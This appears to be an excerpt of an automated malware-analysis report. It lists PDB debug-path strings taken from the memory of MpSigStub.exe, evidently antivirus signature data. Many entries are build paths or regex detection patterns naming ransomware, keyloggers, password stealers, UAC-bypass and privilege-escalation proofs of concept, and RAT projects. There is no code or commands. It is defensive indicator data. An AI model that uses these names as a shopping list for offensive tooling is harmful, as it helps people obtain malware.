Source:	Binary string: wl-cmd\Release\dll1.pdb source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp
Source:	Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000023.00000003.6310854687.0000028BD61A4000.00000004.00000001.sdmp
Source:	Binary string: sctasks.pdbd source: MpSigStub.exe, 00000023.00000003.6271903950.0000028BD6A3F000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
Source:	Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp
Source:	Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000023.00000003.6310448430.0000028BD6169000.00000004.00000001.sdmp
Source:	Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdb source: MpSigStub.exe, 00000023.00000003.6316424698.0000028BD7976000.00000004.00000001.sdmp
Source:	Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: reg.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
Source:	Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000023.00000003.6313892884.0000028BD728C000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: \x64\release\shell.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: hWEHW#@HJERKJERJER^$.Pdb~ source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: mgr.pdb source: MpSigStub.exe, 00000023.00000003.6317125613.0000028BD6C91000.00000004.00000001.sdmp
Source:	Binary string: \Release\ComBroadcaster.pdb source: MpSigStub.exe, 00000023.00000003.6338781268.0000028BD70B3000.00000004.00000001.sdmp
Source:	Binary string: bot.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: b-- b3: bs: bue b1f bss b5+(b---b51-b74-bd6-bf8-bbf-ban-bot-bne.bog.bck.bpk.bm.bup.b.s.but.be /be10b420b180bc01bd31bb91b2c1b-b2b6f2b443b683b7-4bd-4by24b994b8a4b,c4b0c4b{65bd85b-95bfa5bgg5b5j5bd96b2c6bhv6be-7b207bf27b-47b077be87b1a7b4f7b528bi38b478b-88b5-9b7f9b3n9but:bg,?bhi_btn_bio_bro_bbs_bet_b: ab86abs_ab-aab5babgbab.cabadabrdabffabciabgrab[tabstab{tabiuab.wab/wab1-bbc-bb59bb89bbjabbffbbtgbb#jbbcobbcsbbbubb26cba8cb4bcb6ecb4fcbyhcbdmcbcpcbipcb-tcb.db</dbe0db27dbpadbbbdbccdb\ddbbddb6edbmodboodb.pdbrrdb-4ebhbeb\debhgebehebtiebklebulebomebjoeb.rebirebprebosebrvebrwebmzeb source: MpSigStub.exe, 00000023.00000003.6292138132.0000028BD80C5000.00000004.00000001.sdmp
Source:	Binary string: \\UniversalOrchestratorPrivEscPoc\\Release\\UniversalOrchestratorPrivEscPoc\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\SkypeSpread.pdb source: MpSigStub.exe, 00000023.00000003.6276951583.0000028BD782D000.00000004.00000001.sdmp
Source:	Binary string: comp.pdbd source: MpSigStub.exe, 00000023.00000003.6311413449.0000028BD79B9000.00000004.00000001.sdmp
Source:	Binary string: \Dolphin.pdb source: MpSigStub.exe, 00000023.00000003.6265938697.0000028BD6B47000.00000004.00000001.sdmp
Source:	Binary string: acpi.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: c:\Documents and Settings\Administrator\My Documents\Visual Studio Projects\EASZZCDFR\Release\EASZZCDFR.pdb source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdbx source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp
Source:	Binary string: -C:\backward\inch\enumeration\Atmel\neces.pdb source: MpSigStub.exe, 00000023.00000003.6430060790.0000028BD7CD0000.00000004.00000001.sdmp
Source:	Binary string: Ivan\Documents\generic_exe\Release\BHO.pdb source: MpSigStub.exe, 00000023.00000003.6346459854.0000028BD6536000.00000004.00000001.sdmp
Source:	Binary string: \CCC\obj\Debug\CCC.pdb source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\ncpa\objfre\i386\ncpa.pdb source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: WhjrkehLkpe;rltjhpow;elkrjjklWEKL#.pdb] source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: EC:\Projects\Docwize\cUniFunctions\obj\DocwizeClient\cUniFunctions.pdbx source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp
Source:	Binary string: .+:\\src\\tcrypt\\Release\\s_(high\|low).pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-io-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: CryptoService.pdb source: MpSigStub.exe, 00000023.00000003.6438769310.0000028BD7F39000.00000004.00000001.sdmp
Source:	Binary string: WanNengWB\WBUpd32.pdb source: MpSigStub.exe, 00000023.00000003.6311571113.0000028BD79D4000.00000004.00000001.sdmp
Source:	Binary string: msasn1.pdb source: MpSigStub.exe, 00000023.00000003.6274482455.0000028BD75C0000.00000004.00000001.sdmp
Source:	Binary string: Asource\repos\Coronavirus1\Coronavirus1\obj\Debug\Coronavirus1.pdb] source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: ,\NetGuy_Explorer\Release\NetGuy_Explorer.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: \TMain\Release\TSvr.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: 6\Desktop\EK\Source\Rina_AC\Rina_AC\Release\Rina_AC.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: ,T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: \SearchProtect\bin\Release\HPNotify.pdb source: MpSigStub.exe, 00000023.00000003.6346082988.0000028BD6579000.00000004.00000001.sdmp
Source:	Binary string: Bou3asba\obj\Release\Danao.pdb source: MpSigStub.exe, 00000023.00000003.6290963131.0000028BD73CB000.00000004.00000001.sdmp
Source:	Binary string: c:\RPCInstall\Release\RPCInstall.pdb source: MpSigStub.exe, 00000023.00000003.6306362414.0000028BD740C000.00000004.00000001.sdmp
Source:	Binary string: Release DlpHook\Proxy.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdba source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: $\Season\Wife_low\531\Quart\table.pdb source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp
Source:	Binary string: \Sample\Release\CNetworking.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
Source:	Binary string: \BypassUac\branches\Download\build\Release\service.pdb source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
Source:	Binary string: 2Projects\VerifyAndLaunch\release\GCO Bootstrap.pdb source: MpSigStub.exe, 00000023.00000003.6321337544.0000028BD6471000.00000004.00000001.sdmp
Source:	Binary string: MC:\Users\wizzlabs\source\repos\ConsoleMap\ConsoleMap\obj\Release\Ehssassi.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: OC:\Users\hoogle168\Desktop\2008Projects\NewCoreCtrl08\Release\NewCoreCtrl08.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: \CRP\Release\Mount.pdbaD source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: :Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000023.00000003.6320629595.0000028BD71FC000.00000004.00000001.sdmp
Source:	Binary string: 7h4qMQ1edvEOY+wQIOdVR_v.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: \Release\MyEncrypter2.pdb source: MpSigStub.exe, 00000023.00000003.6438080287.0000028BD7556000.00000004.00000001.sdmp
Source:	Binary string: c:\dev\torntv\Release\TornTVApp.pdb source: MpSigStub.exe, 00000023.00000003.6324858901.0000028BD71BA000.00000004.00000001.sdmp
Source:	Binary string: winlogon.PDB source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdbx source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
Source:	Binary string: \RUNPCH\Release\GUO_CAU.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: 0.pdb source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp
Source:	Binary string: \bundler\Production\bundler.pdb source: MpSigStub.exe, 00000023.00000003.6282378484.0000028BD702F000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-shlwapi-obsolete-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
Source:	Binary string: D:\C++\AsusShellCode\Release\AsusShellCode.pdb source: MpSigStub.exe, 00000023.00000003.6325372368.0000028BD6661000.00000004.00000001.sdmp
Source:	Binary string: R,\\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000023.00000003.6301031977.0000028BD6979000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdbx source: MpSigStub.exe, 00000023.00000003.6287012861.0000028BD6A98000.00000004.00000001.sdmp
Source:	Binary string: costura.injectordll.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
Source:	Binary string: )\CVE-2019-0803201992\Release\poc_test.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: cleanmgr.pdbPE source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp
Source:	Binary string: [H:\My Data\My Source Code\Microsoft Office 2010\AutoKMS\AutoKMS\obj\x86\Release\AutoKMS.pdb source: MpSigStub.exe, 00000023.00000003.6326794298.0000028BD64F4000.00000004.00000001.sdmp
Source:	Binary string: mpengine.pdbOGPS source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: A .+\\WormWin32 Poenon.+\\.+.pdb source: MpSigStub.exe, 00000023.00000003.6322660545.0000028BD67AB000.00000004.00000001.sdmp
Source:	Binary string: f:\project_2008\Fileman_candle_kgrid\Filebus\Bin\UpdateWindow.pdb source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
Source:	Binary string: wRHWRH@4hjethwehgw.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: unknowndll.pdba~ source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: \fiDarSayebni.pdb source: MpSigStub.exe, 00000023.00000003.6270225099.0000028BD77EA000.00000004.00000001.sdmp
Source:	Binary string: IperiusRDPClient.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: %KMS Client\bin\Release\KMS Client.pdba} source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: S\ccnet\Publish_Client\work\src\mainapp\Abacus.LaunchMail\bin\Release\LaunchMail.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\attrib\objfre\i386\attrib.pdbP& source: MpSigStub.exe, 00000023.00000003.6277372616.0000028BD786E000.00000004.00000001.sdmp
Source:	Binary string: C:\SuccWare\SuccWare\obj\Debug\SuccWare.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: wajam_goblin.pdb source: MpSigStub.exe, 00000023.00000003.6338116203.0000028BD7305000.00000004.00000001.sdmp
Source:	Binary string: \\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: d:\av\common_main.obj.x86chk\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\twunk_16\objchk\i386\twunk_16.pdb source: MpSigStub.exe, 00000023.00000003.6339668679.0000028BD61EC000.00000004.00000001.sdmp
Source:	Binary string: MsiDatabaseMerge.pdb source: MpSigStub.exe, 00000023.00000003.6317668915.0000028BD6D56000.00000004.00000001.sdmp
Source:	Binary string: joy.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: WebBrowserPassView.pdb source: MpSigStub.exe, 00000023.00000003.6295888912.0000028BD60A3000.00000004.00000001.sdmp
Source:	Binary string: msimg32.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: E:\Work\SaveVid\Savevid-WS-Trunk\InstallCore\rbin\soffer.pdb source: MpSigStub.exe, 00000023.00000003.6333995743.0000028BD75DA000.00000004.00000001.sdmp
Source:	Binary string: GCWYq1g.pdb source: MpSigStub.exe, 00000023.00000003.6437420306.0000028BD7B02000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!%WINDIR%\Microsoft.NET\mscorsvw.exe source: MpSigStub.exe, 00000023.00000003.6289461513.0000028BD744F000.00000004.00000001.sdmp
Source:	Binary string: mfcsubs.pdb source: MpSigStub.exe, 00000023.00000003.6325684988.0000028BD66A2000.00000004.00000001.sdmp
Source:	Binary string: Release\NtdsAudit.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: netsh.pdbj source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: BTR.pdbGCTL source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: mshta.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: D:\developement\projects\flood_load\Release\flood_load.pdb source: MpSigStub.exe, 00000023.00000003.6434983405.0000028BD7D95000.00000004.00000001.sdmp
Source:	Binary string: PROZIPPER.pdb source: MpSigStub.exe, 00000023.00000003.6310854687.0000028BD61A4000.00000004.00000001.sdmp
Source:	Binary string: sfxrar32\Release\sfxrar.pdbxB source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: \\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: ddraw.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
Source:	Binary string: GPDFDocument.pdb source: MpSigStub.exe, 00000023.00000003.6315879958.0000028BD6D14000.00000004.00000001.sdmp
Source:	Binary string: wbadmin.pdb source: MpSigStub.exe, 00000023.00000003.6340606272.0000028BD78F3000.00000004.00000001.sdmp
Source:	Binary string: *\ClientPlugin\obj\Release\ClientPlugin.pdb source: MpSigStub.exe, 00000023.00000003.6429156271.0000028BD7766000.00000004.00000001.sdmp
Source:	Binary string: Unite.pdb source: MpSigStub.exe, 00000023.00000003.6300664525.0000028BD7A3C000.00000004.00000001.sdmp
Source:	Binary string: \Release\WCmouiTri.pdb] source: MpSigStub.exe, 00000023.00000003.6436760184.0000028BD67ED000.00000004.00000001.sdmp
Source:	Binary string: z:\Projects\Rescator\uploader\Debug\scheck.pdb] source: MpSigStub.exe, 00000023.00000003.6433098800.0000028BD744E000.00000004.00000001.sdmp
Source:	Binary string: \MailClient\Release\MailClient.pdb source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp
Source:	Binary string: L%D:\\MyCode\\riot.?\\decryptor.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: :FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdbx source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\w32tm\objfre\i386\w32tm.pdb source: MpSigStub.exe, 00000023.00000003.6304347628.0000028BD6F26000.00000004.00000001.sdmp
Source:	Binary string: Flipopia.pdb source: MpSigStub.exe, 00000023.00000003.6305976502.0000028BD7388000.00000004.00000001.sdmp
Source:	Binary string: \Ozrenko\Documents\Work\Interstat2\Interstat2\Weather\Interstat.pdb source: MpSigStub.exe, 00000023.00000003.6347031294.0000028BD72C3000.00000004.00000001.sdmp
Source:	Binary string: Downloads\notepad-master\Release\notepad.pdb source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
Source:	Binary string: AdFind\Release\AdFind.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: d:\young\swprojects\tdxin\bin\amd64\rtdxftex_amd64.pdb source: MpSigStub.exe, 00000023.00000003.6434592860.0000028BD6EA1000.00000004.00000001.sdmp
Source:	Binary string: \Black Coding\RAT+BOT\WebServer 2.0\src\Release\WebServer.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: nethtsrv.pdb source: MpSigStub.exe, 00000023.00000003.6270596186.0000028BD6DDB000.00000004.00000001.sdmp
Source:	Binary string: S\\server\\V.\\Release\\PhantomNet.*\.pdb source: MpSigStub.exe, 00000023.00000003.6268576251.0000028BD5F61000.00000004.00000001.sdmp
Source:	Binary string: \PCHunter64.pdb source: MpSigStub.exe, 00000023.00000003.6277659200.0000028BD78B0000.00000004.00000001.sdmp
Source:	Binary string: Release\toolbar_setup.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\Narrator.pdb source: MpSigStub.exe, 00000023.00000003.6432490535.0000028BD7D54000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdbxc source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
Source:	Binary string: rasautou.pdb source: MpSigStub.exe, 00000023.00000003.6273486144.0000028BD7B45000.00000004.00000001.sdmp
Source:	Binary string: \obj\Release\PersistenceModule.pdb source: MpSigStub.exe, 00000023.00000003.6308515408.0000028BD71BB000.00000004.00000001.sdmp
Source:	Binary string: ?ExtractedBundle\RTM_ImageModRec_1.1.5.0_x64\RTM_ImageModRec.pdbac source: MpSigStub.exe, 00000023.00000003.6303687995.0000028BD6EE5000.00000004.00000001.sdmp
Source:	Binary string: ?E:\hhu\TeamViewer_13.bjbj\BuildTarget\Release2017\tv_w32dll.pdb source: MpSigStub.exe, 00000023.00000003.6430913129.0000028BD7E73000.00000004.00000001.sdmp
Source:	Binary string: \i386\lanmandrv.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: c:\divide\broad\Hole\DoThird.pdb source: MpSigStub.exe, 00000023.00000003.6437748593.0000028BD7B43000.00000004.00000001.sdmp
Source:	Binary string: e:\updatecheck\UpdateCheck\release\UpdateCheck.pdb source: MpSigStub.exe, 00000023.00000003.6264485610.0000028BD7D13000.00000004.00000001.sdmp
Source:	Binary string: XBundlerTlsHelper.pdb source: MpSigStub.exe, 00000023.00000003.6308028829.0000028BD7156000.00000004.00000001.sdmp
Source:	Binary string: \Release\corsar.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: UqxIkBeNYhKR.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: e:\src\fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: e:\builddata\Install\source\Min_Loader-BuildAndDeploy\Release\Loader_Resized.pdb source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: mpg2splt.pdb source: MpSigStub.exe, 00000023.00000003.6266507875.0000028BD63ED000.00000004.00000001.sdmp
Source:	Binary string: tdc.pdb source: MpSigStub.exe, 00000023.00000003.6284624022.0000028BD68F5000.00000004.00000001.sdmp
Source:	Binary string: obj\Release\FlashPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.6275998369.0000028BD761D000.00000004.00000001.sdmp
Source:	Binary string: c:\supply\trouble\Classwho.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: dxtrans.pdb source: MpSigStub.exe, 00000023.00000003.6265277219.0000028BD7767000.00000004.00000001.sdmp
Source:	Binary string: \Microsoft Windows Search.pdb source: MpSigStub.exe, 00000023.00000003.6285428567.0000028BD7FBD000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdb source: MpSigStub.exe, 00000023.00000003.6335925716.0000028BD63AB000.00000004.00000001.sdmp
Source:	Binary string: KF.+:\\Projects\\C#\\Sayad\\Source\\Client\\bin\\x86\\Debug\\Client.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
Source:	Binary string: AntiMalware_Pro.pdb source: MpSigStub.exe, 00000023.00000003.6339082124.0000028BD7EB5000.00000004.00000001.sdmp
Source:	Binary string: fc.pdb0 source: MpSigStub.exe, 00000023.00000003.6307279106.0000028BD6061000.00000004.00000001.sdmp
Source:	Binary string: \Gleaned\purecall\win32p6.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
Source:	Binary string: Slb.EP.Shell.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: E@.+:\\Projects\\tidynet\\Release\\(selfdestruct\|tidynetwork).pdb source: MpSigStub.exe, 00000023.00000003.6435757961.0000028BD7C8D000.00000004.00000001.sdmp
Source:	Binary string: EFRE65.pdb source: MpSigStub.exe, 00000023.00000003.6315331031.0000028BD6126000.00000004.00000001.sdmp
Source:	Binary string: lIFdrGkmBePss.pdb source: MpSigStub.exe, 00000023.00000003.6430356442.0000028BD7C4C000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:PossiblyClean:magottei.pdb.A source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: C>s:\\dEVELOPMdNT\\dC\+\+dCdyptordEvoldtiod_dld\\release\\m.pdb source: MpSigStub.exe, 00000023.00000003.6429782920.0000028BD77E9000.00000004.00000001.sdmp
Source:	Binary string: CryARr.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: FreeDownloadmanager\obj\x86\Debug\FreeDownloadManager.pdb source: MpSigStub.exe, 00000023.00000003.6343425129.0000028BD67F0000.00000004.00000001.sdmp
Source:	Binary string: KSLDriver.pdbGCTL source: MpSigStub.exe, 00000023.00000003.6228750405.0000028BC72CB000.00000004.00000001.sdmp
Source:	Binary string: boteg.pdbxL source: MpSigStub.exe, 00000023.00000003.6305464629.0000028BD7725000.00000004.00000001.sdmp
Source:	Binary string: zYAamTGB2rfW!Cp+aR.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: D:\program z visuala\keylogger\Release\keylogger.pdb source: MpSigStub.exe, 00000023.00000003.6434103017.0000028BD7BC7000.00000004.00000001.sdmp
Source:	Binary string: \GetWinPsw.pdb source: MpSigStub.exe, 00000023.00000003.6323594204.0000028BD69BA000.00000004.00000001.sdmp
Source:	Binary string: \\WOO\\HT\\HT Server\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.6293840071.0000028BD7E72000.00000004.00000001.sdmp
Source:	Binary string: SAVService.pdb source: MpSigStub.exe, 00000023.00000003.6328027500.0000028BD6832000.00000004.00000001.sdmp
Source:	Binary string: \bin\winfdmscheme.pdb source: MpSigStub.exe, 00000023.00000003.6342575052.0000028BD6369000.00000004.00000001.sdmp
Source:	Binary string: zC:\Users\EchoHackCmd\source\repos\Minecraft_DLL_Injector\Minecraft_DLL_Injector\obj\x64\Release\Minecraft_DLL_Injector.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
Source:	Binary string: 7laIR+\|.XJ5aA0aa.pdb source: MpSigStub.exe, 00000023.00000003.6428681257.0000028BD5FA3000.00000004.00000001.sdmp
Source:	Binary string: wevtutil.pdb source: MpSigStub.exe, 00000023.00000003.6295229489.0000028BD65FD000.00000004.00000001.sdmp
Source:	Binary string: wscript.pdb source: MpSigStub.exe, 00000023.00000003.6296840471.0000028BD7347000.00000004.00000001.sdmp
Source:	Binary string: \isn.pdb source: MpSigStub.exe, 00000023.00000003.6433423811.0000028BD748F000.00000004.00000001.sdmp
Source:	Binary string: Wizzlabs\windows\Newtonsoft.Json\obj\Release\Newtonsoft.Json.pdb source: MpSigStub.exe, 00000023.00000003.6322023418.0000028BD7EF7000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\Lucca\\AppData\\Local\\Temp\\.*\.pdb source: MpSigStub.exe, 00000023.00000003.6295487239.0000028BD661C000.00000004.00000001.sdmp
Source:	Binary string: \Ransomware2.0.pdb source: MpSigStub.exe, 00000023.00000003.6436106917.0000028BD69FC000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdbx source: MpSigStub.exe, 00000023.00000003.6280430921.0000028BD7B02000.00000004.00000001.sdmp
Source:	Binary string: C:\\Users\\john\\Documents\\Visual Studio 2008\\Projects\\EncryptFile.\\.\\EncryptFile.exe.pdb source: MpSigStub.exe, 00000023.00000003.6275312196.0000028BD7491000.00000004.00000001.sdmp
Source:	Binary string: \DownloaderMain\DownloaderDll.pdb source: MpSigStub.exe, 00000023.00000003.6319059958.0000028BD62F3000.00000004.00000001.sdmp
Source:	Binary string: \rANSOM\rANSOM\obj\Sanyasteakler\rANSOM.pdb source: MpSigStub.exe, 00000023.00000003.6429470799.0000028BD77A7000.00000004.00000001.sdmp
